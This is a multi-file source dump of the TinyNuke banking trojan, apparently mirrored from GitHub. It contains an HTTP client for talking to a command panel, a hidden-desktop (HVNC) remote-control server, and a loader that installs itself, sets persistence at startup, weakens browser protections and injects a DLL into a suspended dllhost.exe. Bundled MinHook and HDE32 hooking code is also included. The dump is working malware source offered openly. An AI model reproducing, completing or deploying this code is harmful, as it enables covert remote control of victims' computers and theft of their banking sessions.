Funcs::pLstrcatA(request, Strs::httpReq3); 18 | 19 | if(httpRequestData.post && httpRequestData.inputBody) 20 | { 21 | Funcs::pLstrcatA(request, Strs::httpReq4); 22 | char sizeStr[10]; 23 | Funcs::pWsprintfA(sizeStr, Strs::sprintfIntEscape, httpRequestData.inputBodySize); 24 | Funcs::pLstrcatA(request, sizeStr); 25 | Funcs::pLstrcatA(request, Strs::winNewLine); 26 | } 27 | Funcs::pLstrcatA(request, Strs::winNewLine); 28 | 29 | if(Funcs::pWSAStartup(MAKEWORD(2, 2), &wsa) != 0) 30 | goto exit; 31 | 32 | if((s = Funcs::pSocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) 33 | goto exit; 34 | 35 | hostent *he = Funcs::pGethostbyname(httpRequestData.host); 36 | if(!he) 37 | goto exit; 38 | 39 | struct sockaddr_in addr; 40 | Funcs::pMemcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); 41 | addr.sin_family = AF_INET; 42 | addr.sin_port = Funcs::pHtons(httpRequestData.port); 43 | 44 | if(Funcs::pConnect(s, (struct sockaddr *) &addr, sizeof(addr)) == SOCKET_ERROR) 45 | goto exit; 46 | if(Funcs::pSend(s, request, Funcs::pLstrlenA(request), 0) <= 0) 47 | goto exit; 48 | 49 | if(httpRequestData.inputBody) 50 | { 51 | if(Funcs::pSend(s, (char *) httpRequestData.inputBody, httpRequestData.inputBodySize, 0) <= 0) 52 | goto exit; 53 | } 54 | 55 | char header[1024] = { 0 }; 56 | int contentLength = -1; 57 | int lastPos = 0; 58 | BOOL firstLine = TRUE; 59 | BOOL transferChunked = FALSE; 60 | 61 | for(int i = 0;; ++i) 62 | { 63 | if(i > sizeof(header) - 1) 64 | goto exit; 65 | if(Funcs::pRecv(s, header + i, 1, 0) <= 0) 66 | goto exit; 67 | if(i > 0 && header[i - 1] == '\r' && header[i] == '\n') 68 | { 69 | header[i - 1] = 0; 70 | if(firstLine) 71 | { 72 | if(Funcs::pLstrcmpiA(header, Strs::httpReq5)) 73 | goto exit; 74 | firstLine = FALSE; 75 | } 76 | else 77 | { 78 | char *field = header + lastPos + 2; 79 | if(Funcs::pLstrlenA(field) == 0) 80 | { 81 | if(contentLength < 0 && !transferChunked) 82 | goto exit; 83 | break; 84 | } 85 | char *name; 86 | char *value; 87 | if((value = (char *) Funcs::pStrStrA(field, Strs::httpReq6))) 88 | { 89 | name = field; 90 | name[value - field] = 0; 91 | value += 2; 92 | if(!Funcs::pLstrcmpiA(name, Strs::httpReq7)) 93 | { 94 | char *endPtr; 95 | contentLength = Funcs::pStrtol(value, &endPtr, 10); 96 | if(endPtr == value) 97 | goto exit; 98 | if(value < 0) 99 | goto exit; 100 | } 101 | else if(!Funcs::pLstrcmpiA(name, Strs::httpReq8)) 102 | { 103 | if(!Funcs::pLstrcmpiA(value, Strs::httpReq9)) 104 | transferChunked = TRUE; 105 | } 106 | value += 2; 107 | } 108 | } 109 | lastPos = i - 1; 110 | } 111 | } 112 | if(transferChunked) 113 | { 114 | const int reallocSize = 16394; 115 | 116 | char sizeStr[10] = { 0 }; 117 | int allocatedSize = reallocSize; 118 | int read = 0; 119 | 120 | httpRequestData.outputBody = (BYTE *) Alloc(reallocSize); 121 | for(int i = 0;;) 122 | { 123 | if(i > sizeof(sizeStr) - 1) 124 | goto exit; 125 | if(Funcs::pRecv(s, sizeStr + i, 1, 0) <= 0) 126 | goto exit; 127 | if(i > 0 && sizeStr[i - 1] == '\r' && sizeStr[i] == '\n') 128 | { 129 | sizeStr[i - 1] = 0; 130 | char *endPtr; 131 | int size = Funcs::pStrtol(sizeStr, &endPtr, 16); 132 | if(endPtr == sizeStr) 133 | goto exit; 134 | if(size < 0) 135 | goto exit; 136 | if(size == 0) 137 | { 138 | httpRequestData.outputBody[httpRequestData.outputBodySize] = 0; 139 | break; 140 | } 141 | httpRequestData.outputBodySize += size; 142 | if(allocatedSize < httpRequestData.outputBodySize + 1) 143 | { 144 | allocatedSize += httpRequestData.outputBodySize + reallocSize; 145 | httpRequestData.outputBody = (BYTE *) ReAlloc(httpRequestData.outputBody, allocatedSize); 146 | } 147 | int chunkRead = 0; 148 | do 149 | { 150 | int read2 = Funcs::pRecv(s, (char *) httpRequestData.outputBody + read + chunkRead, size - chunkRead, 0); 151 | if(read2 <= 0) 152 | goto exit; 153 | chunkRead += read2; 154 | } while(chunkRead != size); 155 | if(Funcs::pRecv(s, sizeStr, 2, 0) <= 0) 156 | goto exit; 157 | read += size; 158 | i = 0; 159 | continue; 160 | } 161 | ++i; 162 | } 163 | } 164 | else 165 | { 166 | if(contentLength > 0) 167 | { 168 | httpRequestData.outputBody = (BYTE *) Alloc(contentLength + 1); 169 | httpRequestData.outputBodySize = contentLength; 170 | httpRequestData.outputBody[httpRequestData.outputBodySize] = 0; 171 | int totalRead = 0; 172 | do 173 | { 174 | int read = Funcs::pRecv(s, (char *) httpRequestData.outputBody + totalRead, contentLength - totalRead, 0); 175 | if(read <= 0) goto exit; 176 | totalRead += read; 177 | } 178 | while(totalRead != contentLength); 179 | } 180 | else 181 | { 182 | httpRequestData.outputBody = (BYTE *) Alloc(1); 183 | httpRequestData.outputBody[0] = 0; 184 | } 185 | } 186 | ret = TRUE; 187 | exit: 188 | if(!ret) 189 | { 190 | httpRequestData.outputBody = NULL; 191 | Funcs::pFree(httpRequestData.outputBody); 192 | } 193 | Funcs::pClosesocket(s); 194 | Funcs::pWSACleanup(); 195 | return ret; 196 | } -------------------------------------------------------------------------------- /HTTP.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | struct HttpRequestData 5 | { 6 | BOOL post; 7 | int port; 8 | char *host; 9 | char *path; 10 | BYTE *inputBody; 11 | int inputBodySize; 12 | BYTE *outputBody; 13 | int outputBodySize; 14 | }; 15 | 16 | BOOL HttpSubmitRequest(HttpRequestData &httpRequestData); -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/HiddenDesktop/HiddenDesktop.sdf -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Server", "Server\Server.vcxproj", "{5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Debug|Win32.Build.0 = Debug|Win32 14 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Release|Win32.ActiveCfg = Release|Win32 15 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /HiddenDesktop/HiddenDesktop.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/HiddenDesktop/HiddenDesktop.v11.suo -------------------------------------------------------------------------------- /HiddenDesktop/Server/Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ws2_32.lib") -------------------------------------------------------------------------------- /HiddenDesktop/Server/ControlWindow.cpp: -------------------------------------------------------------------------------- 1 | #include "ControlWindow.h" 2 | 3 | static const TCHAR *className = TEXT("HiddenDesktop_ControlWindow"); 4 | static const TCHAR *titlePattern = TEXT("%S Hidden Desktop"); 5 | 6 | BOOL CW_Register(WNDPROC lpfnWndProc) 7 | { 8 | WNDCLASSEX wndClass; 9 | wndClass.cbSize = sizeof(WNDCLASSEX); 10 | wndClass.style = CS_DBLCLKS; 11 | wndClass.lpfnWndProc = lpfnWndProc; 12 | wndClass.cbClsExtra = 0; 13 | wndClass.cbWndExtra = 0; 14 | wndClass.hInstance = NULL; 15 | wndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION); 16 | wndClass.hCursor = LoadCursor(NULL, IDC_ARROW); 17 | wndClass.hbrBackground = (HBRUSH) COLOR_WINDOW; 18 | wndClass.lpszMenuName = NULL; 19 | wndClass.lpszClassName = className; 20 | wndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION); 21 | return RegisterClassEx(&wndClass); 22 | } 23 | 24 | HWND CW_Create(DWORD uhid, DWORD width, DWORD height) 25 | { 26 | TCHAR title[100]; 27 | IN_ADDR addr; 28 | addr.S_un.S_addr = uhid; 29 | 30 | wsprintf(title, titlePattern, inet_ntoa(addr)); 31 | 32 | HWND hWnd = CreateWindow(className, 33 | title, 34 | WS_MAXIMIZEBOX | WS_MINIMIZEBOX | WS_SIZEBOX | WS_SYSMENU, 35 | CW_USEDEFAULT, 36 | CW_USEDEFAULT, 37 | width, 38 | height, 39 | NULL, 40 | NULL, 41 | GetModuleHandle(NULL), 42 | NULL); 43 | 44 | if(hWnd == NULL) 45 | return NULL; 46 | 47 | ShowWindow(hWnd, SW_SHOW); 48 | return hWnd; 49 | } -------------------------------------------------------------------------------- /HiddenDesktop/Server/ControlWindow.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | BOOL CW_Register(WNDPROC lpfnWndProc); 4 | HWND CW_Create(DWORD uhid, DWORD width, DWORD height); -------------------------------------------------------------------------------- /HiddenDesktop/Server/Main.cpp: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "ControlWindow.h" 3 | #include "Server.h" 4 | 5 | #define majVer 1 6 | #define minVer 0 7 | 8 | int CALLBACK WinMain(HINSTANCE hInstance, 9 | HINSTANCE hPrevInstance, 10 | LPSTR lpCmdLine, 11 | int nCmdShow) 12 | { 13 | AllocConsole(); 14 | 15 | freopen("CONIN$", "r", stdin); 16 | freopen("CONOUT$", "w", stdout); 17 | freopen("CONOUT$", "w", stderr); 18 | 19 | SetConsoleTitle(TEXT("Hidden Desktop")); 20 | 21 | wprintf(TEXT("Version: %d.%d\n"), majVer, minVer); 22 | wprintf(TEXT("Compiled: %S @ %S\n"), __DATE__, __TIME__); 23 | 24 | if(!StartServer(atoi(lpCmdLine))) 25 | { 26 | wprintf(TEXT("Could not start the server (Error: %d)\n"), WSAGetLastError()); 27 | getchar(); 28 | return 0; 29 | } 30 | return 0; 31 | } -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "ControlWindow.h" 3 | 4 | BOOL StartServer(int port); -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3} 15 | Win32Proj 16 | Server 17 | 18 | 19 | 20 | Application 21 | true 22 | v110 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110_xp 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | 51 | 52 | Level3 53 | Disabled 54 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 55 | 56 | 57 | Windows 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | 65 | 66 | MaxSpeed 67 | true 68 | true 69 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 70 | MultiThreaded 71 | 72 | 73 | Windows 74 | true 75 | true 76 | true 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /HiddenDesktop/Server/Server.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 6667 5 | WindowsLocalDebugger 6 | 7 | 8 | 6667 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /HiddenDesktop/readme.txt: -------------------------------------------------------------------------------- 1 | This does not use the VNC protocol but is still called VNC in the panel because it is the same thing as the zeus HVNC -------------------------------------------------------------------------------- /Inject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64); -------------------------------------------------------------------------------- /Loader/Loader.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {d8534896-e1f2-4da7-b799-d39f1f2a9e08} 18 | 19 | 20 | {ead81735-1c50-40c8-bcb3-03d2e223befe} 21 | 22 | 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Header Files 55 | 56 | 57 | Header Files 58 | 59 | 60 | Header Files 61 | 62 | 63 | Header Files\wow64ext 64 | 65 | 66 | Header Files\wow64ext 67 | 68 | 69 | Header Files\wow64ext 70 | 71 | 72 | Header Files\wow64ext 73 | 74 | 75 | -------------------------------------------------------------------------------- /Loader/Loader.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Loader/Main.cpp: -------------------------------------------------------------------------------- 1 | #pragma comment(linker, "/ENTRY:Entry") 2 | 3 | #include "..\Common.h" 4 | 5 | #define RUN_DEBUG FALSE 6 | 7 | static void Install(char *path) 8 | { 9 | //melt 10 | char temp[MAX_PATH]; 11 | GetTempPathBotPrefix(temp); 12 | HANDLE hFile = Funcs::pCreateFileA 13 | ( 14 | temp, 15 | GENERIC_WRITE, 16 | 0, 17 | NULL, 18 | CREATE_ALWAYS, 19 | FILE_ATTRIBUTE_NORMAL, 20 | NULL 21 | ); 22 | DWORD written; 23 | Funcs::pWriteFile(hFile, path, Funcs::pLstrlenA(path), &written, NULL); 24 | Funcs::pCloseHandle(hFile); 25 | //end melt 26 | 27 | char installPath[MAX_PATH] = { 0 }; 28 | GetInstallPath(installPath); 29 | Funcs::pCopyFileA(path, installPath, FALSE); 30 | SetStartupValue(installPath); 31 | 32 | STARTUPINFOA startupInfo = { 0 }; 33 | PROCESS_INFORMATION processInfo = { 0 }; 34 | 35 | startupInfo.cb = sizeof(startupInfo); 36 | 37 | Funcs::pCreateProcessA(installPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo); 38 | } 39 | 40 | static void Run() 41 | { 42 | SetFirefoxPrefs(); 43 | DisableMultiProcessesAndProtectedModeIe(); 44 | InitPanelRequest(); 45 | BYTE *mainPluginPe = NULL; 46 | 47 | GetDlls(&mainPluginPe, NULL, FALSE); 48 | 49 | char dllhostPath[MAX_PATH] = { 0 }; 50 | 51 | Funcs::pSHGetFolderPathA(NULL, CSIDL_SYSTEM, NULL, 0, dllhostPath); 52 | 53 | Funcs::pLstrcatA(dllhostPath, Strs::fileDiv); 54 | Funcs::pLstrcatA(dllhostPath, Strs::dllhostExe); 55 | 56 | STARTUPINFOA startupInfo = { 0 }; 57 | PROCESS_INFORMATION processInfo = { 0 }; 58 | 59 | startupInfo.cb = sizeof(startupInfo); 60 | 61 | Funcs::pCreateProcessA(dllhostPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo); 62 | InjectDll(mainPluginPe, processInfo.hProcess, FALSE); 63 | } 64 | 65 | void Entry() 66 | { 67 | InitApi(); 68 | char botId [BOT_ID_LEN] = { 0 }; 69 | char exePath[MAX_PATH] = { 0 }; 70 | char *exeName; 71 | GetBotId(botId); 72 | HANDLE hMutex = Funcs::pCreateMutexA(NULL, TRUE, botId); 73 | if(Funcs::pGetLastError() == ERROR_ALREADY_EXISTS) 74 | Funcs::pExitProcess(0); 75 | Funcs::pReleaseMutex(hMutex); 76 | Funcs::pCloseHandle(hMutex); 77 | #if(RUN_DEBUG) 78 | Run(); 79 | #else 80 | Funcs::pGetModuleFileNameA(NULL, exePath, MAX_PATH); 81 | exeName = Funcs::pPathFindFileNameA(exePath); 82 | if(Funcs::pStrncmp(botId, exeName, Funcs::pLstrlenA(botId)) != 0) 83 | Install(exePath); 84 | else 85 | Run(); 86 | #endif 87 | Funcs::pExitProcess(0); 88 | } -------------------------------------------------------------------------------- /MinHook/include/MinHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszTarget [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszTarget [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /MinHook/src/buffer.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | // Size of each memory slot. 32 | #ifdef _M_X64 33 | #define MEMORY_SLOT_SIZE 64 34 | #else 35 | #define MEMORY_SLOT_SIZE 32 36 | #endif 37 | 38 | VOID InitializeBuffer(VOID); 39 | VOID UninitializeBuffer(VOID); 40 | LPVOID AllocateBuffer(LPVOID pOrigin); 41 | VOID FreeBuffer(LPVOID pBuffer); 42 | BOOL IsExecutableAddress(LPVOID pAddress); 43 | -------------------------------------------------------------------------------- /MinHook/src/hde/hde32.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 32 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #include "hde32.h" 9 | #include "table32.h" 10 | 11 | unsigned int hde32_disasm(const void *code, hde32s *hs) 12 | { 13 | uint8_t x, c, *p = (uint8_t *)code, cflags, opcode, pref = 0; 14 | uint8_t *ht = hde32_table, m_mod, m_reg, m_rm, disp_size = 0; 15 | 16 | // Avoid using memset to reduce the footprint. 17 | #ifndef _MSC_VER 18 | memset((LPBYTE)hs, 0, sizeof(hde32s)); 19 | #else 20 | __stosb((LPBYTE)hs, 0, sizeof(hde32s)); 21 | #endif 22 | 23 | for (x = 16; x; x--) 24 | switch (c = *p++) { 25 | case 0xf3: 26 | hs->p_rep = c; 27 | pref |= PRE_F3; 28 | break; 29 | case 0xf2: 30 | hs->p_rep = c; 31 | pref |= PRE_F2; 32 | break; 33 | case 0xf0: 34 | hs->p_lock = c; 35 | pref |= PRE_LOCK; 36 | break; 37 | case 0x26: case 0x2e: case 0x36: 38 | case 0x3e: case 0x64: case 0x65: 39 | hs->p_seg = c; 40 | pref |= PRE_SEG; 41 | break; 42 | case 0x66: 43 | hs->p_66 = c; 44 | pref |= PRE_66; 45 | break; 46 | case 0x67: 47 | hs->p_67 = c; 48 | pref |= PRE_67; 49 | break; 50 | default: 51 | goto pref_done; 52 | } 53 | pref_done: 54 | 55 | hs->flags = (uint32_t)pref << 23; 56 | 57 | if (!pref) 58 | pref |= PRE_NONE; 59 | 60 | if ((hs->opcode = c) == 0x0f) { 61 | hs->opcode2 = c = *p++; 62 | ht += DELTA_OPCODES; 63 | } else if (c >= 0xa0 && c <= 0xa3) { 64 | if (pref & PRE_67) 65 | pref |= PRE_66; 66 | else 67 | pref &= ~PRE_66; 68 | } 69 | 70 | opcode = c; 71 | cflags = 